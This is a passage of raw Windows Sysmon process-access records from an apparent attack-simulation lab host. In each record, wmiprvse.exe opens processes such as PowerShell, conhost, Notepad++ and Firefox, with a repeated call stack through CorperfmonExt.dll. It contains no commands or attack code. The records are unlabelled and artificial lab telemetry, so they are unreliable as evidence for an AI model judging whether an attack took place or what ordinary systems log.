Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149459Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149458Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149457Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149456Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149455Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149454Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149453Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149452Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149451Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149450Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149449Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149448Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149447Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149446Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149445Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149444Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149443Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149442Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149441Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149440Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149439Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149438Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149437Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149436Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla 